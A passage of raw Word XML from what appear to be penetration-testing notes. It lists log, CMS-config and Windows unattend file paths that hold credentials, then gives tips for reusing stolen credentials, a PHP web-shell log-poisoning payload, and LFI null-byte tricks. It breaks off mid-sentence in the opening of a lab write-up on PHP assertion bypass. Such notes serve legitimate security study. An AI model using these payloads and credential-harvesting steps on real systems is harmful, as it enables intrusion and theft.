      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache/error.log, /var/log/apache2/error.log, /var/log/httpd/error_log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Same as access logs; can be poisoned with malicious code for RCE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C93">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/messages</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: General system logs; may reveal credentials or system activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C94">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/cron.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lists scheduled tasks; may expose paths or command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/auth.log:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authentication attempts; can expose usernames and login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/wp-config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: WordPress config file; contains DB creds and salts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C97">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/configuration.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Joomla config file; contains DB creds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/inc/header.inc.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Dolphin CMS config; contains DB info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/sites/default/settings.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Drupal config; holds DB access info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/configuration.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Mambo CMS config; same as above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="907"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/config.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Generic PHP app config; often includes sensitive credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C9F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\System32\drivers\etc\hosts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Shows hostname-to-IP mappings; useful in internal targeting or domain spoofing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\Panther\Unattend*/Autounattend*</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Setup files often containing plaintext admin passwords and setup info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\system32\sysprep</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: May contain leftover scripts or config leaks from image preparation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\inetpub\wwwroot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Default IIS web root; can help locate the web app codebase.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\inetpub\wwwroot\web.config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Web config file; may leak DB strings or authentication data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\inetpub\logs\logfiles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: IIS logs; can be poisoned or used for recon like Apache logs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="441"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\inetpub\logs\LogFiles\W3SVC1\:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> IIS logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Tip for Logs/Configs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="849"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If a file contains credentials or tokens, extract and use them for login, lateral movement, or privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="849"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it's a log file, log poisoning (injecting &lt;?php system($_GET['cmd']); ?&gt; via User-Agent or other headers) then including that file can yield RCE if PHP interprets it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CAA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="849"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Windows unattended install files, grep for password, Administrator, or autoLogon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CAB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CAC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CAD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_65o02y40xbtm" w:id="236"/>
      <w:bookmarkEnd w:id="236"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI Tricks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CAE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try bypassing the PHP assertions (look below for tips)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CAF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try null terminating it with Null byte at the end. Just add</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> %00</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes in older PHP, they will append extensions like .php to the end, and so adding this will terminate the string</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="374"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try Encoding (look below for tips)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_g9jdh9t8iq7w" w:id="237"/>
      <w:bookmarkEnd w:id="237"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bypassing PHP Assertions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId567">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Assertion101</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, as you can guess from the name of the box, it has to do with PHP Assertions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CB9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We had potential LFI, but every time we try adding the string "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">..</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like when we do</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ../ for LFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), we got a page that said "Not so easy brother!". This was a hint (as well as the name of the box) that the page was using PHP Assertions to check for the "..". And also, the page was in PHP, so that's a hint too.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, to bypass PHP Assertions, we can use this </w:t>
      </w:r>
      <w:hyperlink r:id="rId568">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
